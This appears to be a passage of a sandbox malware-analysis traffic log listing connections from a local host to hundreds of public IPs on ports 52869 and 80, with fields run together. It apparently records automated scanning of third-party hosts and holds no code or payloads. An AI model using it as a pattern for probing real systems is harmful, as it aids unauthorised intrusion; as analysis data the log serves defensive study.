                                                Jul 20, 2024 23:05:32.028304100 CEST528692696696.55.180.219192.168.2.14
                                                Jul 20, 2024 23:05:32.028307915 CEST5286926966152.186.151.198192.168.2.14
                                                Jul 20, 2024 23:05:32.028443098 CEST5286926966118.145.115.33192.168.2.14
                                                Jul 20, 2024 23:05:32.028448105 CEST528692696613.138.26.20192.168.2.14
                                                Jul 20, 2024 23:05:32.028453112 CEST528692696668.201.157.11192.168.2.14
                                                Jul 20, 2024 23:05:32.028526068 CEST528692696681.198.189.131192.168.2.14
                                                Jul 20, 2024 23:05:32.028592110 CEST2696652869192.168.2.14161.29.255.146
                                                Jul 20, 2024 23:05:32.028593063 CEST2696652869192.168.2.14201.205.244.63
                                                Jul 20, 2024 23:05:32.028593063 CEST2696652869192.168.2.14104.252.153.132
                                                Jul 20, 2024 23:05:32.028593063 CEST2696652869192.168.2.1480.70.162.243
                                                Jul 20, 2024 23:05:32.028593063 CEST2696652869192.168.2.14185.193.162.177
                                                Jul 20, 2024 23:05:32.028593063 CEST2696652869192.168.2.14102.126.174.49
                                                Jul 20, 2024 23:05:32.028593063 CEST2696652869192.168.2.1466.24.201.56
                                                Jul 20, 2024 23:05:32.028593063 CEST2696652869192.168.2.14171.139.100.38
                                                Jul 20, 2024 23:05:32.028615952 CEST5286926966176.208.112.109192.168.2.14
                                                Jul 20, 2024 23:05:32.028620958 CEST528692696651.148.178.221192.168.2.14
                                                Jul 20, 2024 23:05:32.028641939 CEST5286926966212.254.248.190192.168.2.14
                                                Jul 20, 2024 23:05:32.028768063 CEST2696652869192.168.2.1444.6.194.12
                                                Jul 20, 2024 23:05:32.028768063 CEST2696652869192.168.2.14106.223.167.59
                                                Jul 20, 2024 23:05:32.028768063 CEST2696652869192.168.2.1459.216.134.233
                                                Jul 20, 2024 23:05:32.028768063 CEST2696652869192.168.2.14144.208.108.131
                                                Jul 20, 2024 23:05:32.028768063 CEST2696652869192.168.2.14114.253.230.78
                                                Jul 20, 2024 23:05:32.028768063 CEST2696652869192.168.2.14118.162.15.87
                                                Jul 20, 2024 23:05:32.028784037 CEST528692696653.104.158.74192.168.2.14
                                                Jul 20, 2024 23:05:32.028789997 CEST5286926966205.167.203.127192.168.2.14
                                                Jul 20, 2024 23:05:32.028867960 CEST528692696646.140.94.219192.168.2.14
                                                Jul 20, 2024 23:05:32.028918028 CEST5286926966168.233.49.39192.168.2.14
                                                Jul 20, 2024 23:05:32.028991938 CEST528692696636.151.23.112192.168.2.14
                                                Jul 20, 2024 23:05:32.029074907 CEST528692696684.96.184.112192.168.2.14
                                                Jul 20, 2024 23:05:32.029139996 CEST528692696679.180.149.218192.168.2.14
                                                Jul 20, 2024 23:05:32.029202938 CEST5286926966125.47.68.181192.168.2.14
                                                Jul 20, 2024 23:05:32.029409885 CEST5286926966144.181.35.38192.168.2.14
                                                Jul 20, 2024 23:05:32.029414892 CEST5286926966207.236.94.3192.168.2.14
                                                Jul 20, 2024 23:05:32.029419899 CEST528692696694.210.96.135192.168.2.14
                                                Jul 20, 2024 23:05:32.029495955 CEST52869269665.19.232.245192.168.2.14
                                                Jul 20, 2024 23:05:32.029500008 CEST528692696672.78.106.232192.168.2.14
                                                Jul 20, 2024 23:05:32.029555082 CEST2696652869192.168.2.1420.51.35.27
                                                Jul 20, 2024 23:05:32.029555082 CEST2696652869192.168.2.14187.172.181.202
                                                Jul 20, 2024 23:05:32.029555082 CEST2696652869192.168.2.1478.87.122.111
                                                Jul 20, 2024 23:05:32.029555082 CEST2696652869192.168.2.14101.192.223.216
                                                Jul 20, 2024 23:05:32.029555082 CEST2696652869192.168.2.14129.129.31.24
                                                Jul 20, 2024 23:05:32.029555082 CEST2747880192.168.2.1495.51.67.17
                                                Jul 20, 2024 23:05:32.029555082 CEST2747880192.168.2.1495.213.62.59
                                                Jul 20, 2024 23:05:32.029583931 CEST528692696680.190.116.2192.168.2.14
                                                Jul 20, 2024 23:05:32.029588938 CEST5286926966120.63.39.150192.168.2.14
                                                Jul 20, 2024 23:05:32.029592037 CEST2696652869192.168.2.14189.150.109.151
                                                Jul 20, 2024 23:05:32.029592037 CEST2696652869192.168.2.1413.79.184.248
                                                Jul 20, 2024 23:05:32.029592037 CEST2696652869192.168.2.14217.96.236.61
                                                Jul 20, 2024 23:05:32.029592037 CEST2696652869192.168.2.1486.142.194.221
                                                Jul 20, 2024 23:05:32.029592037 CEST2696652869192.168.2.1465.246.44.29
                                                Jul 20, 2024 23:05:32.029592037 CEST2696652869192.168.2.14212.45.243.123
                                                Jul 20, 2024 23:05:32.029751062 CEST5286926966221.1.36.152192.168.2.14
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.14212.160.183.244
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.14114.248.35.135
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.14116.137.1.46
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.1438.30.142.71
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.14134.42.80.231
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.14159.166.244.164
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.14219.45.60.7
                                                Jul 20, 2024 23:05:32.029799938 CEST2696652869192.168.2.1446.187.173.179
                                                Jul 20, 2024 23:05:32.029827118 CEST5286926966149.11.81.145192.168.2.14
                                                Jul 20, 2024 23:05:32.029840946 CEST5286926966191.137.205.200192.168.2.14
                                                Jul 20, 2024 23:05:32.029840946 CEST2696652869192.168.2.14163.207.135.120
                                                Jul 20, 2024 23:05:32.029840946 CEST2696652869192.168.2.1447.189.88.4
                                                Jul 20, 2024 23:05:32.029840946 CEST2696652869192.168.2.1481.106.75.29
                                                Jul 20, 2024 23:05:32.029840946 CEST2696652869192.168.2.1449.40.14.168
                                                Jul 20, 2024 23:05:32.029840946 CEST2696652869192.168.2.1458.166.14.49
                                                Jul 20, 2024 23:05:32.029840946 CEST2696652869192.168.2.14216.99.12.212
                                                Jul 20, 2024 23:05:32.029841900 CEST2696652869192.168.2.14142.78.152.174
                                                Jul 20, 2024 23:05:32.029841900 CEST2696652869192.168.2.1438.58.57.187
                                                Jul 20, 2024 23:05:32.029968023 CEST528692696647.188.189.126192.168.2.14
                                                Jul 20, 2024 23:05:32.030070066 CEST5286926966161.128.80.182192.168.2.14
                                                Jul 20, 2024 23:05:32.030073881 CEST528692696624.165.122.205192.168.2.14
                                                Jul 20, 2024 23:05:32.030206919 CEST528692696676.181.138.218192.168.2.14
                                                Jul 20, 2024 23:05:32.030473948 CEST5286926966188.235.214.61192.168.2.14
                                                Jul 20, 2024 23:05:32.030478954 CEST5286926966182.25.120.189192.168.2.14
                                                Jul 20, 2024 23:05:32.030483961 CEST5286926966164.46.151.82192.168.2.14
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.14212.27.232.196
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.1413.103.166.161
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.14106.242.159.86
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.1423.103.185.202
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.14188.77.131.223
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.14108.217.234.151
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.1419.19.127.134
                                                Jul 20, 2024 23:05:32.030492067 CEST2696652869192.168.2.14185.131.102.32
                                                Jul 20, 2024 23:05:32.030519009 CEST5286926966156.8.17.233192.168.2.14
                                                Jul 20, 2024 23:05:32.030587912 CEST5286926966151.89.187.172192.168.2.14
                                                Jul 20, 2024 23:05:32.030639887 CEST528692696692.37.5.52192.168.2.14
                                                Jul 20, 2024 23:05:32.030774117 CEST5286926966193.133.163.215192.168.2.14
                                                Jul 20, 2024 23:05:32.030811071 CEST5286926966167.111.204.126192.168.2.14
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.14209.32.45.39
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.1485.2.134.27
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.14150.137.36.182
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.14192.4.87.149
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.14131.172.186.104
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.14204.136.75.160
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.1424.36.23.230
                                                Jul 20, 2024 23:05:32.030916929 CEST2696652869192.168.2.1443.123.34.209
                                                Jul 20, 2024 23:05:32.030942917 CEST5286926966169.120.213.25192.168.2.14
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.1466.113.138.125
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.14183.150.0.25
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.1463.215.125.146
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.14204.46.41.237
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.14167.95.218.219
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.14185.61.35.183
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.14116.108.240.14
                                                Jul 20, 2024 23:05:32.030980110 CEST2696652869192.168.2.14188.78.100.195
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.149.219.245
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.141.241.34
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.30.215.131
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.103.199.233
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.236.153.96
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.200.56.77
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.202.64.243
                                                Jul 20, 2024 23:05:32.031019926 CEST2747880192.168.2.1495.31.42.191
                                                Jul 20, 2024 23:05:32.031116962 CEST5286926966111.193.163.87192.168.2.14
                                                Jul 20, 2024 23:05:32.031243086 CEST5286926966216.43.210.251192.168.2.14
                                                Jul 20, 2024 23:05:32.031306028 CEST2696652869192.168.2.1498.204.63.160
                                                Jul 20, 2024 23:05:32.031306028 CEST2696652869192.168.2.1485.92.221.132
                                                Jul 20, 2024 23:05:32.031306028 CEST2696652869192.168.2.1478.106.126.128
                                                Jul 20, 2024 23:05:32.031306028 CEST2747880192.168.2.1495.140.77.139
                                                Jul 20, 2024 23:05:32.031306982 CEST2747880192.168.2.1495.90.175.46
                                                Jul 20, 2024 23:05:32.031306982 CEST2747880192.168.2.1495.90.211.182
                                                Jul 20, 2024 23:05:32.031306982 CEST2747880192.168.2.1495.219.244.209
                                                Jul 20, 2024 23:05:32.031306982 CEST2747880192.168.2.1495.153.161.43
                                                Jul 20, 2024 23:05:32.031900883 CEST2696652869192.168.2.1499.142.28.231
                                                Jul 20, 2024 23:05:32.031902075 CEST2696652869192.168.2.1434.254.39.110
                                                Jul 20, 2024 23:05:32.031902075 CEST2696652869192.168.2.1425.44.198.165
                                                Jul 20, 2024 23:05:32.031902075 CEST2696652869192.168.2.14113.5.116.213
                                                Jul 20, 2024 23:05:32.031902075 CEST2696652869192.168.2.14190.13.210.38
                                                Jul 20, 2024 23:05:32.031902075 CEST2696652869192.168.2.14136.20.227.19
                                                Jul 20, 2024 23:05:32.031902075 CEST2696652869192.168.2.14184.120.85.233
                                                Jul 20, 2024 23:05:32.031902075 CEST2696652869192.168.2.1444.94.77.219
                                                Jul 20, 2024 23:05:32.032319069 CEST2696652869192.168.2.14100.242.161.152
                                                Jul 20, 2024 23:05:32.032319069 CEST2696652869192.168.2.14208.190.47.45
                                                Jul 20, 2024 23:05:32.032319069 CEST2696652869192.168.2.14220.85.100.118
                                                Jul 20, 2024 23:05:32.032319069 CEST2696652869192.168.2.14159.79.50.159
                                                Jul 20, 2024 23:05:32.032319069 CEST2696652869192.168.2.1488.243.181.245
                                                Jul 20, 2024 23:05:32.032319069 CEST2696652869192.168.2.14183.41.221.53
                                                Jul 20, 2024 23:05:32.032319069 CEST2747880192.168.2.1495.196.78.122
                                                Jul 20, 2024 23:05:32.032319069 CEST2747880192.168.2.1495.12.86.121
                                                Jul 20, 2024 23:05:32.032496929 CEST2696652869192.168.2.14192.36.11.156
                                                Jul 20, 2024 23:05:32.032496929 CEST2696652869192.168.2.1480.33.234.217
                                                Jul 20, 2024 23:05:32.032496929 CEST2696652869192.168.2.14220.27.166.91
                                                Jul 20, 2024 23:05:32.032496929 CEST2696652869192.168.2.1486.163.46.190
                                                Jul 20, 2024 23:05:32.032496929 CEST2747880192.168.2.1495.171.59.128
                                                Jul 20, 2024 23:05:32.032496929 CEST2747880192.168.2.1495.92.89.0
                                                Jul 20, 2024 23:05:32.032496929 CEST2747880192.168.2.1495.253.68.139
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.10.176.176
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.105.189.30
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.104.82.181
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.118.229.127
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.222.143.107
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.52.240.67
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.152.242.220
                                                Jul 20, 2024 23:05:32.032571077 CEST2747880192.168.2.1495.233.67.203
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.155.142.152
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.106.213.101
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.95.0.150
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.221.104.28
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.232.172.140
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.253.60.168
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.89.1.223
                                                Jul 20, 2024 23:05:32.032742977 CEST2747880192.168.2.1495.67.18.163
                                                Jul 20, 2024 23:05:32.033081055 CEST2696652869192.168.2.14219.251.58.169
                                                Jul 20, 2024 23:05:32.033081055 CEST2696652869192.168.2.149.46.190.218
                                                Jul 20, 2024 23:05:32.033081055 CEST2696652869192.168.2.14108.163.57.3
                                                Jul 20, 2024 23:05:32.033081055 CEST2696652869192.168.2.14128.233.224.41
                                                Jul 20, 2024 23:05:32.033081055 CEST2696652869192.168.2.1468.236.166.115
                                                Jul 20, 2024 23:05:32.033081055 CEST2747880192.168.2.1495.106.119.20
                                                Jul 20, 2024 23:05:32.033081055 CEST2747880192.168.2.1495.225.106.73
                                                Jul 20, 2024 23:05:32.033081055 CEST2747880192.168.2.1495.205.8.174
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.7.55.159
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.175.95.30
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.160.37.150
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.135.8.87
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.226.123.37
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.124.33.247
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.144.61.219
                                                Jul 20, 2024 23:05:32.033356905 CEST2747880192.168.2.1495.35.102.19
                                                Jul 20, 2024 23:05:32.034064054 CEST2747880192.168.2.1495.226.174.85
                                                Jul 20, 2024 23:05:32.034064054 CEST2747880192.168.2.1495.230.80.161
                                                Jul 20, 2024 23:05:32.034064054 CEST2696652869192.168.2.14113.202.183.61
                                                Jul 20, 2024 23:05:32.034064054 CEST2696652869192.168.2.1499.35.215.64
                                                Jul 20, 2024 23:05:32.034064054 CEST2696652869192.168.2.14179.8.112.110
                                                Jul 20, 2024 23:05:32.034064054 CEST2696652869192.168.2.141.94.40.26
                                                Jul 20, 2024 23:05:32.034064054 CEST2696652869192.168.2.14158.15.232.165
                                                Jul 20, 2024 23:05:32.034064054 CEST2696652869192.168.2.144.107.32.7
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.4.118.136
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.110.156.86
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.138.187.113
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.90.183.228
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.97.246.58
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.171.188.0
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.189.144.101
                                                Jul 20, 2024 23:05:32.034149885 CEST2747880192.168.2.1495.122.203.9
                                                Jul 20, 2024 23:05:32.034293890 CEST2747880192.168.2.1495.225.31.235
                                                Jul 20, 2024 23:05:32.034293890 CEST2747880192.168.2.1495.7.223.209
                                                Jul 20, 2024 23:05:32.034293890 CEST2747880192.168.2.1495.36.184.91
                                                Jul 20, 2024 23:05:32.034293890 CEST2747880192.168.2.1495.47.9.11
                                                Jul 20, 2024 23:05:32.034293890 CEST2747880192.168.2.1495.162.173.254
                                                Jul 20, 2024 23:05:32.034293890 CEST2696652869192.168.2.14180.112.125.192
                                                Jul 20, 2024 23:05:32.034293890 CEST2747880192.168.2.1495.192.5.101
                                                Jul 20, 2024 23:05:32.034293890 CEST2747880192.168.2.1495.0.108.122
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.113.152.215
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.88.166.31
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.141.125.136
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.59.195.243
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.196.26.178
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.142.95.47
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.195.65.217
                                                Jul 20, 2024 23:05:32.034331083 CEST2747880192.168.2.1495.172.50.64
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.1458.187.24.14
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.1484.176.4.197
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.14149.40.185.158
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.1454.179.197.253
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.1474.165.192.1
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.14138.179.150.234
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.14158.59.229.105
                                                Jul 20, 2024 23:05:32.034364939 CEST2696652869192.168.2.1432.156.133.181
                                                Jul 20, 2024 23:05:32.035361052 CEST2747880192.168.2.1495.119.161.98
                                                Jul 20, 2024 23:05:32.035361052 CEST2747880192.168.2.1495.217.117.186
                                                Jul 20, 2024 23:05:32.035361052 CEST2747880192.168.2.1495.120.130.213
                                                Jul 20, 2024 23:05:32.035361052 CEST2747880192.168.2.1495.150.140.105
                                                Jul 20, 2024 23:05:32.035361052 CEST2747880192.168.2.1495.184.55.19
                                                Jul 20, 2024 23:05:32.035361052 CEST2747880192.168.2.1495.176.104.254
                                                Jul 20, 2024 23:05:32.035362005 CEST2747880192.168.2.1495.6.133.254
                                                Jul 20, 2024 23:05:32.035362005 CEST2747880192.168.2.1495.79.86.158
                                                Jul 20, 2024 23:05:32.035437107 CEST2747880192.168.2.1495.159.252.208
                                                Jul 20, 2024 23:05:32.035437107 CEST2747880192.168.2.1495.162.207.34
                                                Jul 20, 2024 23:05:32.035437107 CEST2696652869192.168.2.14104.168.168.224
                                                Jul 20, 2024 23:05:32.035437107 CEST2696652869192.168.2.14123.47.34.183
                                                Jul 20, 2024 23:05:32.035437107 CEST2696652869192.168.2.14136.176.36.12
                                                Jul 20, 2024 23:05:32.035437107 CEST2696652869192.168.2.1477.165.177.101
                                                Jul 20, 2024 23:05:32.035437107 CEST2696652869192.168.2.1457.156.10.133
                                                Jul 20, 2024 23:05:32.035437107 CEST2696652869192.168.2.14101.168.57.208
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.14110.110.210.158
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.14118.239.0.22
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.14168.103.98.57
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.14131.37.148.1
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.14149.255.36.61
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.14108.224.254.63
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.1452.137.137.200
                                                Jul 20, 2024 23:05:32.035469055 CEST2696652869192.168.2.14116.219.5.125
                                                Jul 20, 2024 23:05:32.035875082 CEST528692696641.130.175.151192.168.2.14
                                                Jul 20, 2024 23:05:32.035876036 CEST5286926966105.94.86.192192.168.2.14
                                                Jul 20, 2024 23:05:32.035881042 CEST5286926966183.104.222.96192.168.2.14
                                                Jul 20, 2024 23:05:32.035881996 CEST5286926966116.60.161.57192.168.2.14
                                                Jul 20, 2024 23:05:32.035882950 CEST5286926966117.170.152.121192.168.2.14
                                                Jul 20, 2024 23:05:32.035883904 CEST802747895.51.67.17192.168.2.14
                                                Jul 20, 2024 23:05:32.035895109 CEST802747895.213.62.59192.168.2.14
                                                Jul 20, 2024 23:05:32.035907030 CEST802747895.149.219.245192.168.2.14
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.1437.155.160.245
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.14160.34.93.40
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.1442.237.231.247
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.14219.66.177.143
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.1470.44.53.32
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.14211.168.65.67
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.14132.127.155.20
                                                Jul 20, 2024 23:05:32.036087036 CEST2696652869192.168.2.14210.81.25.54
                                                Jul 20, 2024 23:05:32.036225080 CEST802747895.141.241.34192.168.2.14
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.14151.161.78.139
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.14217.10.146.133
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.1450.169.78.0
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.1440.63.22.218
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.14111.107.133.4
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.14173.155.18.45
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.14206.64.31.236
                                                Jul 20, 2024 23:05:32.036259890 CEST2696652869192.168.2.1413.89.114.62
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.232.80.100
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.234.32.130
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.167.177.92
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.79.219.101
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.50.79.159
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.187.48.85
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.138.43.61
                                                Jul 20, 2024 23:05:32.036334038 CEST2747880192.168.2.1495.120.43.18
                                                Jul 20, 2024 23:05:32.036585093 CEST802747895.30.215.131192.168.2.14
                                                Jul 20, 2024 23:05:32.036590099 CEST802747895.103.199.233192.168.2.14
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.14133.38.109.131
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.1413.234.82.233
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.14222.144.111.136
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.14218.76.143.250
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.14122.189.25.105
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.148.243.247.217
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.1484.42.51.191
                                                Jul 20, 2024 23:05:32.036686897 CEST2696652869192.168.2.14199.30.2.87
                                                Jul 20, 2024 23:05:32.036807060 CEST802747895.140.77.139192.168.2.14
                                                Jul 20, 2024 23:05:32.036820889 CEST802747895.236.153.96192.168.2.14
                                                Jul 20, 2024 23:05:32.036825895 CEST802747895.90.175.46192.168.2.14
                                                Jul 20, 2024 23:05:32.036953926 CEST802747895.90.211.182192.168.2.14
                                                Jul 20, 2024 23:05:32.036958933 CEST802747895.219.244.209192.168.2.14
                                                Jul 20, 2024 23:05:32.037076950 CEST802747895.200.56.77192.168.2.14
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.14177.76.222.234
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.14211.230.13.173
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.14167.165.75.73
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.14145.137.68.101
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.1469.34.220.126
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.14123.115.221.42
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.14176.175.140.183
                                                Jul 20, 2024 23:05:32.037264109 CEST2696652869192.168.2.14126.213.114.105
                                                Jul 20, 2024 23:05:32.037321091 CEST802747895.202.64.243192.168.2.14
                                                Jul 20, 2024 23:05:32.037326097 CEST802747895.31.42.191192.168.2.14
                                                Jul 20, 2024 23:05:32.037334919 CEST2747880192.168.2.1495.75.70.176
                                                Jul 20, 2024 23:05:32.037334919 CEST2747880192.168.2.1495.158.58.2
                                                Jul 20, 2024 23:05:32.037336111 CEST2747880192.168.2.1495.137.148.134
                                                Jul 20, 2024 23:05:32.037336111 CEST2747880192.168.2.1495.242.95.195
                                                Jul 20, 2024 23:05:32.037336111 CEST2747880192.168.2.1495.233.82.10
                                                Jul 20, 2024 23:05:32.037336111 CEST2747880192.168.2.1495.63.226.197
                                                Jul 20, 2024 23:05:32.037336111 CEST2747880192.168.2.1495.231.75.162
                                                Jul 20, 2024 23:05:32.037336111 CEST2747880192.168.2.1495.44.111.211
                                                Jul 20, 2024 23:05:32.037380934 CEST802747895.10.176.176192.168.2.14
                                                Jul 20, 2024 23:05:32.037446976 CEST802747895.153.161.43192.168.2.14
                                                Jul 20, 2024 23:05:32.037657976 CEST802747895.155.142.152192.168.2.14
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.14143.189.174.32
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.14223.222.123.59
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.14203.108.87.69
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.14197.181.147.41
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.1446.126.78.10
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.141.144.229.105
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.14193.29.123.122
                                                Jul 20, 2024 23:05:32.037663937 CEST2696652869192.168.2.14198.228.20.233
                                                Jul 20, 2024 23:05:32.037713051 CEST802747895.106.213.101192.168.2.14
                                                Jul 20, 2024 23:05:32.037933111 CEST2696652869192.168.2.14196.248.250.76
                                                Jul 20, 2024 23:05:32.037933111 CEST2696652869192.168.2.14208.213.254.132
                                                Jul 20, 2024 23:05:32.037934065 CEST2696652869192.168.2.14104.139.76.56
                                                Jul 20, 2024 23:05:32.037934065 CEST2696652869192.168.2.14166.79.80.42
                                                Jul 20, 2024 23:05:32.037934065 CEST2696652869192.168.2.14180.189.232.97
                                                Jul 20, 2024 23:05:32.037934065 CEST2696652869192.168.2.1420.141.224.39
                                                Jul 20, 2024 23:05:32.037934065 CEST2696652869192.168.2.1462.17.26.193
                                                Jul 20, 2024 23:05:32.037934065 CEST2696652869192.168.2.14156.75.110.98
                                                Jul 20, 2024 23:05:32.037966967 CEST2747880192.168.2.1495.199.134.153
                                                Jul 20, 2024 23:05:32.037966967 CEST2747880192.168.2.1495.109.117.158
                                                Jul 20, 2024 23:05:32.037966967 CEST2747880192.168.2.1495.239.4.186
                                                Jul 20, 2024 23:05:32.037966967 CEST2696652869192.168.2.14201.92.64.129
                                                Jul 20, 2024 23:05:32.037966967 CEST2696652869192.168.2.1436.129.193.156
